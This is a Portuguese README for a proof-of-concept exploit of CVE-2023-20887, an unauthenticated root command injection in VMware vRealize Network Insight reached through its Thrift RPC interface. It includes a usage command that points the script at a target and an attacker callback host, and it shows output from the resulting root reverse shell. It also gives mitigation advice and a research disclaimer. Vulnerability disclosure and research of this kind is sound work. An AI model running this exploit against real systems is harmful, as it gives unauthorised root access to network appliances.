
VMWare vRealize Network Insight RCE Pré-Autenticada (CVE-2023-20887)
POC para CVE-2023-20887 VMware Aria Operations for Networks (vRealize Network Insight) RCE não autenticado
Uma análise de causa raiz da vulnerabilidade pode ser encontrada no meu blog: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

VMware Aria Operations for Networks (vRealize Network Insight) é vulnerável a injeção de comandos ao aceitar entrada do usuário por meio da interface RPC Apache Thrift. Essa vulnerabilidade permite que um atacante remoto não autenticado execute comandos arbitrários no sistema operacional subjacente como usuário root. A interface RPC é protegida por um proxy reverso que pode ser contornado. A VMware avaliou a gravidade desse problema na faixa de severidade Crítica, com uma pontuação base máxima CVSSv3 de 9.8. Um ator malicioso pode obter execução remota de código no contexto de 'root' no appliance. As versões 6.x da VMware são vulneráveis.
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
Atualize para a versão mais recente ou mitigue seguindo as instruções do Progress Advisory
Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.